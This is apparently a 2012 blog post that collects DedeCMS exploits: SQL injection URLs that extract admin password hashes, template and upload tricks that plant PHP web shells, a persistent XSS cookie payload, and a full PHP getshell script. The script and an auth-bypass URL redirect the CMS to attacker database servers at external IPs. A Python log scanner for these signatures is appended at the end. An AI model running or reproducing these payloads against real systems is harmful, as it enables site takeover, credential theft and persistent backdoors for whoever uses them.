DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability

Register as a member and upload software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-type XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. No matter how you visit any of the URLs below, our XSS is triggered.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The prerequisite for this vulnerability is that the backend path must be obtained first.

Dedecms织梦 tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the user backend, post an article, upload an image, then in attachment management replace the image with our carefully crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path. 3. Visit the edited article:
Assume the aid of the article just edited is 2; then we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Post an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦(Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 characters removed, giving a 20-character MD5 password; the method is: remove 3 from the front and 1 from the back to get a 16-character MD5.

织梦(Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦(Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦(dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording the database error message with PHP into a file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves that the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦(DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
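As an added defensive example (not part of the original post): a Python scanner that flags, in constructed access-log lines, the request signatures this post lists, such as the GLOBALS override through _COOKIE/_POST, the advancedsearch.php sql parameter, gotopage script injection, the edit_face.php path traversal and the rss.php _Cs[] probe. The log format, IPs and hosts are assumptions, and it inspects the request line only, so body-carried overrides (the mytag_js.php form above) need request-body logging to be seen.

```python
import re
from urllib.parse import unquote_plus

# Request-line signatures distilled from the payloads listed in the post above.
# Each rule is applied to the URL-decoded request target of an access-log line.
SIGNATURES = [
    # DedeCMS global override via request-supplied _COOKIE/_POST/_GET arrays
    ("dede_globals_override",
     re.compile(r"_(?:COOKIE|POST|GET)\[GLOBALS\]\[cfg_\w+\]", re.I)),
    # Arbitrary SQL through plus/advancedsearch.php?sql=
    ("dede_advancedsearch_sql",
     re.compile(r"/plus/advancedsearch\.php\?.*\bsql=\s*select\b", re.I)),
    # Script injection through dede/login.php?gotopage=
    ("dede_gotopage_xss",
     re.compile(r"/login\.php\?.*gotopage=[^ ]*<script", re.I)),
    # Path traversal in member/edit_face.php oldface= (dopost=delold)
    ("dede_edit_face_traversal",
     re.compile(r"/member/edit_face\.php\?.*oldface=[^ ]*\.\./", re.I)),
    # Error-based injection probes in the plus/rss.php _Cs[] parameter
    ("dede_rss_cs_injection",
     re.compile(r"/plus/rss\.php\?.*_Cs\[.*(?:updatexml|\bselect\b)", re.I)),
]

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample lines (not real traffic); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /dede/login.php?dopost=login'
    '&validate=dcug&userid=admin&pwd=inimda'
    '&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 512',
    '10.0.0.6 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/advancedsearch.php?mid=1'
    '&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1024',
    '10.0.0.7 - - [18/Oct/2012:10:43:30 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 2048',
    '10.0.0.8 - - [18/Oct/2012:10:44:10 +0800] "GET /member/edit_face.php?dopost=delold'
    '&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 77',
    '10.0.0.9 - - [18/Oct/2012:10:45:00 +0800] "GET /dede/login.php'
    '?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300',
]


def parse_line(line):
    """Return the fields of one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised too."""
    cur = target
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def scan_lines(lines):
    """Return (client ip, rule name, raw target) for every signature hit, in log order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crash the scan
        decoded = decode_target(rec["target"])
        for name, rx in SIGNATURES:
            if rx.search(decoded):
                hits.append((rec["ip"], name, rec["target"]))
    return hits


if __name__ == "__main__":
    for ip, rule, target in scan_lines(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{target}")
```

The clean view.php request in the sample produces no hit, which is the check that the rules key on the injected parameters rather than on the DedeCMS paths themselves.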